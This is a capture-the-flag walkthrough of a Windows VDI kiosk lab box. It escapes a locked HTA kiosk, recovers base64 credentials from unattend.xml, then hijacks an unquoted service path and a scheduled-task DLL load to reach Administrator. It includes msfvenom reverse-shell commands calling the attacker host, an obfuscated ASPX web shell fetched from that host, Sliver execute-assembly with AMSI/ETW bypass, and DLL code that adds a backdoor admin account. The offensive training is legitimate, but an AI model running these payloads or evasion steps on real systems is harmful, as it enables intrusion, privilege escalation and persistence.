Overview

The machine starts by connecting to an RDP endpoint that drops into a locked HTA kiosk, escaping via the print dialog to get a shell as vdiuser, then credential hunting uncovers base64-encoded credentials in unattend.xml to pivot to svcuser. From svcuser, an unquoted service path in the Darkhaven Kiosk Monitor service running as dh_admin is exploited by dropping a Sliver service implant to get a session as dh_admin. From there, SeImpersonatePrivilege is abused via SigmaPotato through execute-assembly to add a local admin, then an alternate path abuses a scheduled task DLL plugin load to execute as Administrator and complete the box.

Enumeration

start with nmap scan

we got only 4 open TCP ports

  1. HTTP on 80 running IIS
  2. SMB on 445
  3. RDP on 3389 leaking some info
    • the Netbios name is EC2AMAZ-0536LUM
  4. HTTPS running on 843 with the title remote access portal leaking the domain name to be darkhaven-vdi.corp

so add entry in the hosts file and lets take a look at the remote access portal

bash 
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$ echo '10.1.58.220 EC2AMAZ-0536LUM EC2AMAZ-0536LUM.darkhaven-vdi.corp darkhaven-vdi.corp' | sudo tee -a /etc/hosts
10.1.58.220 EC2AMAZ-0536LUM EC2AMAZ-0536LUM.darkhaven-vdi.corp darkhaven-vdi.corp

we're given two notes from the author

DarkHaven has provided you with low-privileged credentials for the VDI portal. Username: vdiuser Password: VDI@DH2024!

If you get a "Script Error" message after connecting to the VDI, you can ignore it. It does not affect the lab in any way. This is what Ryan (author) said, "VDIs are usually broken, at least that is what we usually see and it is a pain to do stuff -- the error is intended."

port 80 is the default IIS page so we might go back to it if we hit a dead end but for now lets focus on the HTTPS

DarkHaven Portal

as you can see it is a portal for the VDI so lets login ss_20260617_075058.png

after logging in we get this page ss_20260617_075241.png

at first i thought it would be something like Citrix where we get the RDP session within the browser itself but in this case it is just page to view stats (that's what we know so far) and clicking connect RDP just gives us the command for the connection with the /sec:rdp meaning it'll be over the RDP not nla network level access ss_20260617_075324.png

RDP as vdiuser

so my version of xfreerdp3 is kinda recent with a different syntax where you have to give a value for the /sec:rdp to be either on and off and same with /cert whether to ignore or deny among other options but once we do that we get a session back

bash 
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$  xfreerdp3 /v:10.1.58.220 /u:vdiuser /p:'VDI@DH2024!' /sec:rdp:on /cert:ignore
[07:58:18:552] [5097:000013ea] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found
[07:58:18:552] [5097:000013ea] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x5D -> no RDP scancode found
[07:58:18:552] [5097:000013ea] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: MDSW: keycode: 0xCB -> no RDP scancode found
[07:58:37:209] [5097:000013ea] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5glue_get_init_creds (Cannot contact any KDC for realm 'FREELANCER.HTB' [-17653282
28])
[07:58:55:233] [5097:000013ea] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5glue_get_init_creds (Cannot contact any KDC for realm 'FREELANCER.HTB' [-17653282
28])
[07:58:55:710] [5097:000013ea] [WARN][com.freerdp.core.gcc] - [gcc_read_server_security_data]: Server uses non-advertised encryption method 0x00000000
[07:58:57:065] [5097:000013ea] [WARN][com.freerdp.core.connection] - [rdp_client_connect_auto_detect]: expected messageChannelId=1008, got 1003
[07:58:57:065] [5097:000013ea] [WARN][com.freerdp.core.license] - [license_read_binary_blob_data]: license binary blob::type BB_ERROR_BLOB, length=0, skipping.
[07:59:00:556] [5097:000013ea] [WARN][com.freerdp.core.connection] - [rdp_client_connect_auto_detect]: expected messageChannelId=1008, got 1003
[07:59:00:594] [5097:000013ea] [INFO][com.freerdp.gdi] - [gdi_init_ex]: Local framebuffer format PIXEL_FORMAT_BGRX32
[07:59:00:594] [5097:000013ea] [INFO][com.freerdp.gdi] - [gdi_init_ex]: Remote framebuffer format PIXEL_FORMAT_BGRA32
[07:59:00:654] [5097:000013ea] [INFO][com.freerdp.channels.rdpsnd.client] - [rdpsnd_load_device_plugin]: [static] Loaded fake backend for rdpsnd
[07:59:00:655] [5097:000013ea] [INFO][com.freerdp.channels.drdynvc.client] - [dvcman_load_addin]: Loading Dynamic Virtual Channel ainput
[07:59:00:656] [5097:000013ea] [INFO][com.freerdp.channels.drdynvc.client] - [dvcman_load_addin]: Loading Dynamic Virtual Channel rdpgfx
[07:59:00:656] [5097:000013ea] [INFO][com.freerdp.channels.drdynvc.client] - [dvcman_load_addin]: Loading Dynamic Virtual Channel disp
[07:59:00:657] [5097:000013ea] [INFO][com.freerdp.channels.drdynvc.client] - [dvcman_load_addin]: Loading Dynamic Virtual Channel rdpsnd
[07:59:03:288] [5097:000013f9] [INFO][com.freerdp.channels.rdpsnd.client] - [rdpsnd_load_device_plugin]: [dynamic] Loaded fake backend for rdpsnd
[07:59:04:947] [5097:000013ea] [INFO][com.freerdp.client.x11] - [xf_logon_error_info]: Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_SESSION_CONTINUE]
[07:59:06:789] [5097:000013f9] [WARN][com.freerdp.channels.drdynvc.client] - [check_open_close_receive]: {Microsoft::Windows::RDS::DisplayControl:10} OnOpen=(nil), OnClose=0x7f06a770c220

after the login we get the script error the author mentioned but it won't affect the lab so lets just move on ss_20260617_080400.png

Source-code Review

clicking around the apps nothing works until i click right-click view source which opens the app source-code in a notepad

all apps are actually just a fake icons that doesn't execute any binaries ss_20260617_081120.png

and because there is an issue with the resizing and we can't really read the source code, i copied it over to my attacker box you have to enable /clipboard with xfreerdp3 for this to work

and as you can see the documents content is saved in the source code itself and i though at the beginning it might be opening actual disk file but no it doesn't ss_20260617_081455.png

Looking at the top of the source code we find that this is an HTA HTML Application + VBS Script not actual windows desktop

html 
<html>
<head>
<title>Darkhaven Workspace</title>
<HTA:APPLICATION
    ID="DarkhavenVDI"
    APPLICATIONNAME="Darkhaven Workspace"
    SCROLL="auto"
    SINGLEINSTANCE="yes"
    WINDOWSTATE="maximize"
    SHOWINTASKBAR="no"
    SYSMENU="no"
    CAPTION="no"
    BORDER="none"
/>
<script language="VBScript">
Sub Window_OnLoad
    window.resizeTo screen.availWidth, screen.availHeight
    window.moveTo 0, 0
    jsInit()
End Sub
</script>
<style>

this part of the source code mentions secure shell execution but using external files only

and there is a lot of validation around this

  1. you can't use any loopback address
  2. you can't use local drive paths like C:\ for example
  3. a lot of executables are blocked like cmd and powershell and .exe files and so on
  4. the file:// protocol is blocked also
  5. relative paths and dangerous characters

so what is allowed

  1. UC paths to external servers only like \\server\share\file
  2. external HTTP URLs

then at the end there is this OpenNetworkDocument() function which is used with UNC paths to open the document

these are the blocked executables and extensions

plaintext 
InStr(pathLower, "cmd") > 0 Or _
             InStr(pathLower, "powershell") > 0 Or _
             InStr(pathLower, "mshta") > 0 Or _
             InStr(pathLower, "wscript") > 0 Or _
             InStr(pathLower, "cscript") > 0 Or _
             InStr(pathLower, ".exe") > 0 Or _
             InStr(pathLower, ".bat") > 0 Or _
             InStr(pathLower, ".com") > 0 Or _
             InStr(pathLower, ".scr") > 0 Or _
             InStr(pathLower, ".pif") > 0 Then

Rabbit Hole 1

the good thing that it only filters based on the file name not the actual content so we can create payload host in on smb and use the UNC path to execute it and maybe we can call it something like payload.hta and the HTA extension isn't blocked anyway

here is the part related to the open Network document but we can't resize it cause resize isn't working but remember we got notepad running so we can use the open dialog trick ss_20260617_082949.png

first create the payload

bash 
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.200.65.74 LPORT=4444 -f hta-psh -o payload.hta
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of hta-psh file: 7823 bytes
Saved as: payload.hta

then start your SMB server

bash 
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$ sudo smbserver.py -smb2support share .
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies

tried this but didn't work out cause it can't find the path ss_20260617_083303.png

the scrolling and resizing didn't work but we can find our way around that using the tab button which is used for moving around in most browsers and once you click tab you'll see that you scrolled down a bit for this input field ss_20260617_083716.png

but the same issue it return an error that the anonymous smb connections isn't allowed for this network ss_20260617_083929.png

Flag 1

back to the open dialog at least we can use it to enumerate what's on that system there is a lot of folder in the C: folder about that darkhaven and VDI one of them is this C:\VDIData where i found the flag one ss_20260617_084244.png

as you can see after clicking open on it it opened in notepad ss_20260617_084323.png

using the open dialog technique we got cmd opened, now we can ignore the anonymous SMB share error cause we can mount our own share with username and password if we really need to ss_20260617_085214.png

Rabbit Hole 2

looking around, I knew that we can abuse one of those HTTP or HTTPS ports if we got write access to one of their directories and maybe they are running as other user so i figured lets check those apps, the HTTP port 80 guessed it was running from wwwroot but it was empty and we don't have write access anyway but the portal on 8443 we got access to and we can actually write to it as BUILTIN\USERS so lets use smb to upload aspx shell

plaintext 
PS C:\DarkhavenPortal> cat .\web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <defaultDocument>
            <files>
                <remove value="Default.htm" />
                <remove value="Default.asp" />
                <remove value="index.htm" />
                <remove value="index.html" />
                <remove value="iisstart.htm" />
                <add value="default.asp" />
            </files>
        </defaultDocument>
    </system.webServer>
</configuration>
PS C:\DarkhavenPortal> icacls .
. NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
  BUILTIN\Administrators:(I)(OI)(CI)(F)
  BUILTIN\Users:(I)(OI)(CI)(RX)
  BUILTIN\Users:(I)(CI)(AD)
  BUILTIN\Users:(I)(CI)(WD)
  CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

I used aspx from laudanum and then re-served SMB but this time with username and password

bash 
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$ sudo smbserver.py -smb2support share . -username jimmy -password jimmy
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies

system error 53

plaintext 
PS C:\DarkhavenPortal> net use \\10.200.65.75\share /user:jimmy jimmy
System error 53 has occurred.

The network path was not found.

and as you can see we mounted the share, now lets get the shell

plaintext 
Control-C
PS C:\DarkhavenPortal> net use \\10.200.65.74\share /user:jimmy jimmy
The command completed successfully.

and laudanum shell was caught as a bad file by the defender

plaintext 
PS C:\DarkhavenPortal> move \\10.200.65.74\share\shell.asp ./shell.asp
move : Operation did not complete successfully because the file contains a virus or potentially unwanted software.
At line:1 char:1
+ move \\10.200.65.74\share\shell.asp ./shell.asp
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : WriteError: (\\10.200.65.74\share\shell.asp:FileInfo) [Move-Item], IOException
    + FullyQualifiedErrorId : MoveFileInfoItemIOError,Microsoft.PowerShell.Commands.MoveItemCommand

so i did some obfuscation for the shell source code (deleting comments), deleting any shell keywords and changing it with words like rip instead of remoteIp and it worked now lets hit that from the web app

bash 
PS C:\DarkhavenPortal> wget http://10.200.65.74/s.asp -O s.asp
PS C:\DarkhavenPortal> ls


    Directory: C:\DarkhavenPortal


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/7/2026 9:40 PM 40 default.asp
-a---- 6/2/2026 2:55 PM 4292 login.asp
-a---- 5/29/2026 2:30 PM 7207 portal.asp
-a---- 3/7/2026 9:40 PM 69 robots.txt
-a---- 6/17/2026 4:12 PM 1771 s.asp
-a---- 3/7/2026 9:40 PM 505 web.config

and i got that the app is running as defaultapppool which is a low privilege application but there is some cool things about this user that we can mention later one of those that he can seImpersonate now lets try and get a shell

ss_20260617_092629.png

didn't work out, I hoped it might work but it didn't so our only option now is to go back for the cmd again and look for any interesting files

Credential Hunting

one of the things that you should always look for is the unattend files where scripts like PowerUp and winpeas does that for us we can't use them due to defender so doing that manually returned the Panther one so lets take a look at

plaintext 

PS C:\> cmd /c "dir C:\ /s /b 2>nul | findstr /i unattend"
C:\ProgramData\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\Windows\Panther\unattend.xml
C:\Windows\Panther\UnattendGC
C:\Windows\Panther\UnattendGC\diagerr.xml
C:\Windows\Panther\UnattendGC\diagwrn.xml
C:\Windows\Panther\UnattendGC\setupact.log
C:\Windows\Panther\UnattendGC\setuperr.log

and here is the file content leaking password for the user svcuser

RDP as svcuser

we got the password so lets check it out

bash 
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$ echo 'UwB2AGMAXwBEAEgAIQAyADAAMgA0AA==' | base64 -d
Svc_DH!2024┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$

and as you can see it is valid for RDP so lets connect

bash 
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$ nxc rdp darkhaven-vdi.corp -u svcuser -p 'Svc_DH!2024'
RDP 10.1.58.220 3389 EC2AMAZ-0536LUM [*] Windows 10 or Windows Server 2016 Build 17763 (name:EC2AMAZ-0536LUM) (domain:EC2AMAZ-0536LUM) (nla:True)
RDP 10.1.58.220 3389 EC2AMAZ-0536LUM [+] EC2AMAZ-0536LUM\svcuser:Svc_DH!2024 (Pwn3d!)
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$

Lets login again with this user

bash 
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$ xfreerdp3 /v:10.1.58.220 /u:svcuser /p:'Svc_DH!2024' /cert:ignore /dynamic-resolution /clipboard /auth-pkg-list:ntlm
[10:06:13:093] [9757:0000261e] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found
[10:06:13:094] [9757:0000261e] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x5D -> no RDP scancode found
[10:06:13:094] [9757:0000261e] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: MDSW: keycode: 0xCB -> no RDP scancode found
[10:06:31:733] [9757:0000261e] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5glue_get_init_creds (Cannot contact any KDC for realm 'FREELANCER.HTB' [-17653282
28])
[10:06:49:749] [9757:0000261e] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5glue_get_init_creds (Cannot contact any KDC for realm 'FREELANCER.HTB' [-17653282
28])
[10:06:51:476] [9757:0000261e] [WARN][com.freerdp.core.connection] - [rdp_client_connect_auto_detect]: expected messageChannelId=1008, got 1003
[10:06:51:477] [9757:0000261e] [WARN][com.freerdp.core.license] - [license_read_binary_blob_data]: license binary blob::type BB_ERROR_BLOB, length=0, skipping.
[10:06:51:538] [9757:0000261e] [WARN][com.freerdp.core.connection] - [rdp_client_connect_auto_detect]: expected messageChannelId=1008, got 1003
[10:06:51:587] [9757:0000261e] [INFO][com.freerdp.gdi] - [gdi_init_ex]: Local framebuffer format PIXEL_FORMAT_BGRX32
[10:06:51:587] [9757:0000261e] [INFO][com.freerdp.gdi] - [gdi_init_ex]: Remote framebuffer format PIXEL_FORMAT_BGRA32
[10:06:51:643] [9757:0000261e] [INFO][com.freerdp.channels.rdpsnd.client] - [rdpsnd_load_device_plugin]: [static] Loaded fake backend for rdpsnd
[10:06:51:646] [9757:0000261e] [INFO][com.freerdp.channels.drdynvc.client] - [dvcman_load_addin]: Loading Dynamic Virtual Channel ainput
[10:06:51:646] [9757:0000261e] [INFO][com.freerdp.channels.drdynvc.client] - [dvcman_load_addin]: Loading Dynamic Virtual Channel rdpgfx
[10:06:51:646] [9757:0000261e] [INFO][com.freerdp.channels.drdynvc.client] - [dvcman_load_addin]: Loading Dynamic Virtual Channel disp
[10:06:51:646] [9757:0000261e] [INFO][com.freerdp.channels.drdynvc.client] - [dvcman_load_addin]: Loading Dynamic Virtual Channel rdpsnd
[10:06:52:153] [9757:00002636] [INFO][com.freerdp.channels.rdpsnd.client] - [rdpsnd_load_device_plugin]: [dynamic] Loaded fake backend for rdpsnd
[10:06:52:384] [9757:0000261e] [INFO][com.freerdp.client.x11] - [xf_logon_error_info]: Logon Error Info LOGON_WARNING [LOGON_MSG_SESSION_CONTINUE]
[10:06:53:266] [9757:00002636] [WARN][com.freerdp.channels.drdynvc.client] - [check_open_close_receive]: {Microsoft::Windows::RDS::DisplayControl:10} OnOpen=(nil), OnClose=0x7f6c650e0220

we drop in another container, and i bet we can use the same technique we used before to get a shell so lets get a powershell ss_20260617_101112.png

got a powershell as svcuser and we got second flag ss_20260617_101230.png

looking at ProgramFiles directory, I found this Services directory that I didn't notice the first time which is also related to darkhaven

bash 
PS C:\Program Files> ls


    Directory: C:\Program Files


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/11/2023 3:08 AM Amazon
d----- 9/15/2018 7:28 AM Common Files
d----- 3/8/2026 1:37 PM Darkhaven Kiosk Services
d----- 6/1/2026 8:18 PM internet explorer
d-r--- 1/13/2021 9:21 PM Windows Defender
d----- 6/1/2026 8:18 PM Windows Defender Advanced Threat Protection
d----- 7/14/2021 4:03 AM Windows Mail
d----- 6/1/2026 8:18 PM Windows Media Player
d----- 6/1/2026 8:18 PM Windows Multimedia Platform
d----- 9/15/2018 7:28 AM windows nt
d----- 1/13/2021 9:21 PM Windows Photo Viewer
d----- 6/1/2026 8:18 PM Windows Portable Devices
d----- 9/15/2018 7:19 AM Windows Security
d----- 9/15/2018 7:19 AM WindowsPowerShell

listing permissions over this directory, we have full access over it as svcuser which kinda makes sense in terms of username and directory name

listing the running services i found the service name

bash 
PS C:\Program Files\Darkhaven Kiosk Services\DH Monitor Service> Get-WmiObject Win32_Service | Where-Object {$_.Name -like "*kiosk*" -or $_.Name -like "*darkhaven*" }


ExitCode : 0
Name : DH_KioskMonitor
ProcessId : 2808
StartMode : Unknown
State : Running
Status : UNKNOWN

lets take a closer look at it

shell 
PS C:\Program Files\Darkhaven Kiosk Services> sc.exe qc DH_KioskMonitor
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: DH_KioskMonitor
        TYPE : 10 WIN32_OWN_PROCESS
        START_TYPE : 2 AUTO_START
        ERROR_CONTROL : 1 NORMAL
        BINARY_PATH_NAME : C:\Program Files\Darkhaven Kiosk Services\DH Monitor Service\monitor.exe
        LOAD_ORDER_GROUP :
        TAG : 0
        DISPLAY_NAME : Darkhaven Kiosk Monitor
        DEPENDENCIES :
        SERVICE_START_NAME : .\dh_admin

so there is an issue here, the Binary Path isn't quoted so we can hijack that binary (kinda) The unquoted service path hijack works because of how Windows resolves paths with spaces when they aren't quoted so for this path:

plaintext 
C:\Program Files\Darkhaven Kiosk Services\DH Monitor Service\monitor.exe

Windows tries each space as a potential path break in order:

  1. C:\Program.exe
  2. C:\Program Files\Darkhaven.exe
  3. C:\Program Files\Darkhaven Kiosk.exe
  4. C:\Program Files\Darkhaven Kiosk Services\DH.exe ← hijack point (any point you can write to before the actual binary, even in some cases you can write the binary itself if you can but i don't need to mess it up just incase we need it later)
  5. Real binary

trying to find if we can start and stop or not got access denied

plaintext 
PS C:\Program Files\Darkhaven Kiosk Services\DH Monitor Service> sc.exe sdshow DH_KioskMonitor
[SC] OpenService FAILED 5:

Access is denied.

trying to restart it blindly worked, so we now can hijack that binary

Dumb move

generate our payload

bash 
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.200.65.74 LPORT=4444 -f exe -o monitor.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: monitor.exe

same issue with the defender, so lets try to find our way around and if didn't work i will have to use sliver then ss_20260617_103034.png

so it was a dumb move cause the defender deleted the service itself instead, and I have to reset the machine

plaintext 
PS C:\Program Files\Darkhaven Kiosk Services\DH Monitor Service> sc.exe query DH_KioskMonitor
[SC] EnumQueryServicesStatus:OpenService FAILED 1060:

The specified service does not exist as an installed service.

I should've used sliver since i saw that windows defender is running or at least write a simple C# App to do this and compile it on the target

Using Sliver

generate a listener and implant

Shell as dh_admin

now restarting the machine it start looking from the root C:\ till the way up to monitor but because there is no quotes it'll check for the DH cause there is a space and that's where is our executable at C:\Program Files\Darkhaven Kiosk Services\DH.exe

plaintext 
SERVICE_NAME: DH_KioskMonitor
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
PS C:\Program Files\Darkhaven Kiosk Services> sc.exe start DH_KioskMonitor

SERVICE_NAME: DH_KioskMonitor
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 3732
        FLAGS              :
PS C:\Program Files\Darkhaven Kiosk Services>

and we got a hit back

bash 
[127.0.0.1] sliver > jobs

 ID Name Protocol Port Domains
==== ====== ========== ====== =========
 2    mtls   tcp        4444


[*] Session d647ace4 ELDERLY_SUMMER - 10.1.23.51:50018 (EC2AMAZ-0536LUM) - windows/amd64 - Wed, 17 Jun 2026 12:07:12 PDT

and the shell is as dh_admin so lets find the third flag

plaintext 
[127.0.0.1] sliver > use d647ace4

[*] Active session ELDERLY_SUMMER (d647ace4-729f-460f-b610-c37f0660e863)

[127.0.0.1] sliver (ELDERLY_SUMMER) > whoami

Logon ID: EC2AMAZ-0536LUM\dh_admin
[*] Current Token ID: EC2AMAZ-0536LUM\dh_admin

and we got the third flag

SeImpersonate on dh_admin

looking at the privileges, this user have impersonate privilege so lets get gp on the box

plaintext 
PS C:\Users\dh_admin\Desktop> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

and because defender is on and it can catch any exploiting tool we can use execute-assembly with sliver

execute-assembly loads a .NET binary directly into memory without writing it to disk (defender won't be alerted) with options like --amsi-bypass to stop even the scan interface so the code runs without runtime scanning and --etw-bypass just in case (for this we only needed the first i guess cause if we didn't use it it'll throw 0x8007000b which is compatibility issue that this .NET version isn't compatible )

now when it comes to the exploit we'll use, I tried a lot nothing worked till Claude recommended using SigmaPotato and here is why

Standard Potato binaries must usually be uploaded to the victim's disk, which immediately risks triggering AV alerts. SigmaPotato adds robust support for .NET Reflection, allowing an operator to load the entire tool directly into the memory of an existing process. Running it "fileless" leaves no footprint on the hard drive and bypasses static file scanners

and as you can see we added the user as administrator

validating the user addition and now we can login via winrm and get the flag

plaintext 
[127.0.0.1] sliver (ELDERLY_SUMMER) > shell


[*] Shell management: `shell ls`, `shell attach <id>`
[*] Escape: press Ctrl-] to return to the Sliver client
[*] Opening shell tunnel ...

[*] Started remote shell [1] with pid 1220


PS C:\Windows\system32>
PS C:\Windows\system32> net user
net user

User accounts for \\EC2AMAZ-0536LUM

-------------------------------------------------------------------------------
Administrator            DefaultAccount           dh_admin
Guest                    jimmex                   kioskuser
svcuser                  vdiuser                  WDAGUtilityAccount
The command completed successfully.

using runas from the powershell does the trick ss_20260617_141405.png

the normal run as won't work cause still our token will be limited and we have to trigger UAC with the jimmex user so we can get full privileges ss_20260617_141957.png

and it worked as you can see and the way i triggered the UAC was by using Start-Process powershell.exe -Verb RunAs

ss_20260617_142104.png

Seeing the flag it mentions something about DLL hijack

Alternative way to Administrator

there is this logs directory that we didn't have access to earlier but now we can read it

bash 
PS C:\DarkhavenTools> dir
dir


    Directory: C:\DarkhavenTools


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/8/2026 1:34 PM logs
-a---- 3/8/2026 1:17 PM 5120 DarkhavenHealthCheck.exe

there is scheduled task running this health check binary which looks for this dhlog.dll and it isn't found, now that we can write that DLL we can hijack and whoever runs this health check we'll be run as is

plaintext 
[2026-06-17 22:35:15] Checking for plugin: C:\DarkhavenTools\logs\dhlog.dll
[2026-06-17 22:35:15] Plugin not found, skipping
[2026-06-17 22:35:15] Health check complete
[2026-06-17 22:36:15] Health check started
[2026-06-17 22:36:15] Checking for plugin: C:\DarkhavenTools\logs\dhlog.dll
[2026-06-17 22:36:15] Plugin not found, skipping
[2026-06-17 22:36:15] Health check complete

wrote dhlog.c just to know who is running the script and dump it into a file

plaintext 
cat dhlog.c
#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID lpReserved) {
    if (reason == DLL_PROCESS_ATTACH) {
        system("whoami > C:\\DarkhavenTools\\logs");
    }
    return TRUE;
}

then compile it

bash 
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$ x86_64-w64-mingw32-gcc -shared -o dhlog.dll dhlog.c

now we see that the DLL is loaded and the administrator is the one who runs that task

plaintext 
[2026-06-17 22:47:15] Loading plugin: C:\DarkhavenTools\logs\dhlog.dll
[2026-06-17 22:47:15] Plugin loaded successfully
[2026-06-17 22:47:15] Health check complete
PS C:\DarkhavenTools\logs> cat whoami.txt
cat whoami.txt
ec2amaz-0536lum\administrator

Ended up adding another user as administrator

plaintext 
cat dhlog.c
#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID lpReserved) {
    if (reason == DLL_PROCESS_ATTACH) {
        system("net user hacker Password123! /add && net localgroup administrators hacker /add");
    }
    return TRUE;
}

then using the same technique we used before by prompting the UAC from the powershell we can get the flag

just wanted to run ProcMon and as you can see it loads the dhlog.dll ![[Pasted image 20260618022225.png]]

and here is the actual task that runs the binary every minute as administrator Pasted image 20260618022857.png

Resources